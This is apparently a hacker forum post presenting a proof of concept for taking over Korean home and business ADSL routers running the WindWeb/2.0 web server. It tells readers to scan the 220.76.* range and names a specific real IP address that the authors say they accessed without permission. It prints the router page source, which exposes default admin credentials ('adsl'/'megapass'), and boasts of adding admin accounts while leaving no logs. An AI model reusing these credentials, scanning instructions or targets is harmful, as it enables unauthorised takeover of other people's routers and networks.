ill make it short and sweet, but, i can tell you NOW, this is useable across MANY routers, and yes, it DOES matter on some routers if they enable or disable ports 80/443 ,inwich netgear, and obviously this brand , doesnt
Here we go… to add an admin or just overwrite one: Info details for exploit / jmp point and server error for gdb … have fun!
like , you will need to find your OWn index.html , as this MUSt be simply, changed, so, when you find, an exmaple would be to scan 220.76.* range.. then, learn some about routers, find a WindWeb, then it should be in theyre admin page BUT this is accessed remotely... and, locally then after you change the pass ... i doubt many opers even change router passes once set....so you make abs no logs really... nothing shows to them unless it is some hi duty server :s so yes, it can very VERY nice... but im not going to handout a *how to* on finding them... simple. find em yaself! 220.76.166.73:80 / was this box btw... so, as you see, 220 , is obv an adsl range and yea, what stupid ass server, runs a router ad ion port 80 ? THIS ONE! bahha Did we contact them, umm no, did they pay us to do any work for them...so no. ///////////////////PoC By xd and dd0k/anemic Server: WindWeb/2.0 Connection: close Content-Type: text/html Web Server Error Report: Server Error: 501 Not Implemented Operating System Error Nr:3997697: errno = 0x3d0001 ///Notes: .korean HOME routers/BIZ routers ALL affected - noted: 4mb and fast on the adsl alone.. not bad for HOME! 4meg/s! <content="text/html; charset=euc-kr"> <SCRIPT LANGUAGE="JavaScript"> var st_lan_ip = new Array(4) var st_lan_subnet = new Array(4) var st_lan_mac = new Array(4) st_lan_ip[0] = "192.168.1.1" st_lan_subnet[0] = "255.255.255.0" st_lan_mac[0] = "00:05:C6:3A:1A:45" var st_lan_active = "1" <!-- var id = new Array(); id[0]="adsl" id[1]="user" var pass = new Array(); pass[0]="megapass" pass[1]="megapass" // will make login on the localhost/ user:adsl pass:megapass